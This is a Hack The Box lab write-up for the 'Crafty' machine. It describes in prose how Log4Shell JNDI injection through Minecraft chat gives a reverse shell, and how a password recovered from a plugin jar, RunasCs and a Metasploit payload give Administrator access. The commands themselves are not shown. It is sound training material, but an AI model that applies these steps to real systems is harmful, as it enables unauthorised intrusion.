Crafty

Platform: Hack The Box

Category/Tags: Windows, CVE, Log4j

Difficulty: Easy

Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I do an nmap scan. I scan all ports to reveal some open ports other than port 80.

nmap results

  • Open ports

    • Port 80 - http

    • Port 25565 - Minecraft server with a version of 1.16.5

This is the landing page, a design inspired by Minecraft.

landing page

I did some web directory fuzzing for hidden directories, subdomain enumeration, and even searching for a Microsoft IIS 10.0 exploit, but had no luck. So I thought that play.crafty.htb was the Minecraft server where we could do some exploration.

Foothold

I have a wild guess that this is a Log4j vulnerability, and Minecraft is one of the services affected by this zero-day vulnerability.

Log4Shell, a critical flaw found in the widely used Java-based logging library, Apache Log4j. Officially identified as CVE-2021-44228, it carries a severity score of 10 out of 10 (CVSS v3.1) from the Common Vulnerability Scoring System (CVSS). From TrendMicro.

I used TLauncher (make sure to use the exact version, 1.16.5) to join the server. I tried to send messages to other players, and it worked as usual (but the server is a bit crap). So I searched the exploit for Log4j and stumbled upon this repository log4j-shell-poc and explored how it works. Before I begin, I change the cmd value from poc.py to "cmd.”.

To setup a listener,

To launch the exploit,

Now, I get the ouput,

log4j exploit

Copy the payload next to “Send me:” (this is the payload that is related to JNDI injection that can lead to RCE).

Paste this to chat,

minecraft chat

Gotcha, we have a response,

log4j exploit response

Now, I checked my Netcat listener, and I got the shell. The user flag is on the desktop.

user shell

Privilege Escalation

This part is the most hard for me, because I’ve tried various tools to gain Administrator privileges.

In the c:\\Users\\svc_minecraft\\server\\plugins, I found the .jar file,

plugins directory

I can’t decompile using the jar command, so I found a way to see the bin files of Java. I came across C:\Program Files\Java\jdk1.8.0_171\bin, and I found jar.exe and javap.exe to see the contents of the jar file. So to decompile the file on the desktop,

I also read all the class files using javap.exe, and I found a string “s67u84zKq8IXw” that might be helpful to gain administrator privileges.

Playercounter.class

So I tried tools like evil-winrm, but again, no luck. So, someone gave a hint from a forum that maybe we can use RunasCs. A utility to execute commands from a high-privilege user. So I tried that, and I’ve opened an HTTP server to transfer the RunasCs.exe file to the machine.

On the remote machine, I download the file.

To check if we can login as Administrator with the string “s67u84zKq8IXw” as a password and execute commands,

runascs

You can now check the root flag in the Administrator/Desktop, but I want a shell that has administrator privileges. In the forum, they also gave a hint that we can use a metasploit (which, as of yet, I don’t know how to execute, but I am great at searching, so I proceed 😄).

I made a payload using Metasploit, with my listening address and port, and spit it out as an exe file.

On the remote machine, I download the file.

And I started the reverse TCP handler to establish a connection and get the shell.

msfconsole

On the remote machine, I run the runascs.exe to get the Administrator privilege and the exp.exe, which is our payload, to get the reverse shell as Administrator.

Here it is, I successfully get the shell.

root shell

Mitigation

Update or patch the Log4j utility to the latest version that includes the fix for the vulnerability.

Previous0xBOverchunked: SQL Injection

Last updated